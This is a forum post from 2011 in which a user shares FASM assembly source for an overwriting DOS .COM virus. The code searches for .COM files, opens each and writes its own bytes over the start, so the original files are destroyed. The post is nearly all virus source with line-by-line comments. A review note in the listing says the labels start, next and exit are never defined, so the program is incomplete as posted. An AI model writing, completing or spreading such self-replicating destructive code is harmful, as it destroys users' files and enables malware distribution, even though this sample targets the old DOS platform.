me239 04 Feb 2011, 03:58
Hello everyone, I wanted to show a simpler example of my previous post. This is an overwriting COM virus in FASM:
;-----------------------------------------------------------------------
; Syntax: FASM (Intel operand order). Target: 16-bit DOS .COM image,
; loaded at offset 100h of its segment (hence "org 100h").
;
; What the listing does, for analysis purposes: it asks DOS for a file
; matching "*.com", opens the match for read/write, and writes its own
; bytes (start..vend) over the beginning of that file. Nothing here
; reads or saves the bytes being replaced, so the affected file's
; original content is lost; recovery means restoring from a known-good
; copy, not "disinfecting" the file.
;
; Observable behaviour for a defender: a find-first/find-next search on
; *.com followed by open-for-write and a short write at the start of
; each match, with the same byte sequence appearing at the head of
; several .COM files afterwards.
;
; NOTE(review): the listing as posted references the labels start, next
; and exit but does not define them, so it is not a complete program as
; shown.
;-----------------------------------------------------------------------
org 100h
        xor cx, cx ; CX = 0: attribute mask for the search (normal files)
        mov dx, comfile ; DS:DX -> "*.com" search pattern
        mov ah, 4eh ; DOS function 4Eh = find first matching file
        int 21h ; DOS call; the result is placed in the DTA
        jc exit ; carry set = no match / error, so leave
        mov ax, 3d02h ; AH=3Dh open file, AL=02h read/write access
        mov dx, 9eh ; 9Eh = default DTA (80h) + 1Eh, the found file's name
        int 21h ; DOS call: open; AX = handle (return status is not checked here)
        xchg   ax, bx ; BX = handle, where the write/close calls expect it
        mov ah, 40h ; DOS function 40h = write to handle
        mov dx, start ; DS:DX = source buffer, beginning at label 'start'
        mov cx, vend-start ; CX = byte count = vend-start
        int 21h ; DOS call: write at the current position of the just-opened file
        mov ah, 3eh ; DOS function 3Eh = close handle in BX
        int 21h ; DOS call: close
        mov ah, 4fh ; DOS function 4Fh = find next matching file
        jmp next ; unconditional jump to 'next' (search loop per the original comment)
        int 20h ; standard COM exit (DOS terminate)
comfile db "*.com", 0 ; search pattern as a zero-terminated (ASCIIZ) string
vend: ; end marker used only for the vend-start size calculation
